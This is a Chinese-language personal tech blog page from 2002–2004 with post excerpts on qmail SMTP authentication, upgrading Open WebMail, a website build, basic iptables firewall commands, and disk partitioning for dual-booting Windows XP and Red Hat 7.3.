    SMTP Authentication Tutorial 是2004年2月4日刚刚发布的一个文档,就现有的相关原理及软件进行了一个全局性的说明。
    我们通常都会使用vpopmail的vchpkw来做密码验证,这样就能将pop3与smtp的认证统一起来,相比来讲我使用qmail差不多都会安装vpopmail的。
    另一方面,需要将qmail的smtpd进程的代码进行改造,使其支持认证的提示和用户信息的输入功能。经常的,我们可以看到http://members.elysium.pl/brush/qmail-smtpd-auth中提供的qmail-smtpd-auth-0.31.tar.gz。而它正是基于Mrs.Brisbyqmail-smtpd hack版本来加入了多几个的认证方式。另一方面,fehcom.de也提供了一个叫做spamcontrol的软件提供了专为qmail-smptd的补丁,也提供了更为细致的文档。

    详细阅读: "终于把邮箱升级完成了"

    2004 年 04 月 15 日

    升级了 Open WebMail 到 3.0

    Posted by kreny at 12:55 PM | 评论 (1) | TrackBack(0) | 阅读全文

    把 Open WebMail 升级了一下,不过好像没多大变化。

    查看全文可以看更新记录(包括原先2.21版本的安装记录)。

    详细阅读: "升级了 Open WebMail 到 3.0"

    2004 年 02 月 12 日

    又做好了一个网站框架

    Posted by kreny at 12:48 PM | 评论 (0) | TrackBack(0) | 阅读全文

    http://www.fjhr.org/

    里面的图片是从164张图片中随机抽选的。 呵呵~8O 就做了这么一个~~ 现在的效率是越来越低了~~ 郁闷...

    2003 年 04 月 12 日

    iptables 记录

    Posted by kreny at 12:24 PM | 评论 (0) | TrackBack(0) | 阅读全文

    文档:
    iptables 主题文档
    http://cmpp.linuxforum.net/NetSnake/

    ##### 查看当前iptables ##### # iptables -L

    ##### 添加一条封IP或网段的记录 #####
    # iptables -A RH-Lokkit-0-50-INPUT -s 211.180.232.172 -j REJECT
    # iptables -A RH-Lokkit-0-50-INPUT -p tcp --destination-port 3306 -j REJECT

    ##### iptables 的保存文件 #####
    /etc/sysconfig/iptables

    ##### 保存iptables #####
    # service iptables save

    ##### 备份iptables #####
    # iptables-save

    ##### 清空所有iptables记录 #####
    # iptables --flush

    详细阅读: "iptables 记录"

    2002 年 05 月 15 日

    [原创留档] Windows XP 和 Redhat 7.3 并存的安装过程

    Posted by kreny at 12:50 PM | 评论 (1) | TrackBack(0) | 阅读全文

    以下这篇是我刚刚起步学 linux 的时候随手写的杂记,无意间在翻阅以前的记录时找到的,暂且在这里作一个留档吧。

    1. 用PQmagic 7.0 将硬盘(60G) 划出4 个区
    PS: 划出两个 Primary !!!! 第一个给windowsXP,第二个给 Linux ,否则linux无法安装. 并设置第一个Partition 为active

    即如下:
    -/dev/hda
    |-/dev/hda1 8G --NTFS active
    |-/dev/hda2 8G --ext3
    |-/dev/hda3 扩展分区 40G
    |-/dev/hda5 1004MB --swap
    |-/dev/hda6 39G --- NTFS
    -/dev/hdc (disk2)
    |-/dev/hdc1 10G FAT32
    |-/dev/hdc2 扩展分区 28G
    |-/dev/hdc5 NTFS 28G


    解释:
    hda1 ntfs ---for Windows XP (8G) Active
    hda2 ex2(今后可以格式化成为ex3) ---for Linux RedHat (8G)
    hda5 ex2 --- for swap (1000Mb)
    hac1 ntfs -- for others

    详细阅读: "[原创留档] Windows XP 和 Redhat 7.3 并存的安装过程"